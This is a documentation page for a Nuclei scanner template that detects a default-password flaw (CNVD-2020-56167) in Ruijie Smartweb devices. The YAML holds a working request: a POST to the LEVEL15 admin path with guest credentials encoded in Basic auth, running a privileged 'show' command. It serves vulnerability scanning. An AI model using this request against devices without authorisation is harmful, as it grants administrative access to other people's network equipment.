Ruijie Smartweb - Default Password
ID: CNVD-2020-56167
Severity: low
Author: pikpikcu
Tags: cnvd,cnvd2020,ruijie,default-login
Description
Section titled “Description”Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CNVD-2020-56167
info: name: Ruijie Smartweb - Default Password author: pikpikcu severity: low description: Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167 - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner metadata: max-request: 1 tags: cnvd,cnvd2020,ruijie,default-login
http: - method: POST path: - "{{BaseURL}}/WEB_VMS/LEVEL15/"
headers: Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition: and matchers: - type: word part: body words: - "Level was: LEVEL15" - "/WEB_VMS/LEVEL15/" condition: and
- type: status status: - 200# digest: 490a00463044022070fdf585155d153ccb869e80351f329e9ca5949886f237bb737acf2729170e5f02203cbfb4f11a40676b77d3e97bc117bb62f1bcfbe301a4aa49f28010fbcd97ac4c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cnvd/2020/CNVD-2020-56167.yaml"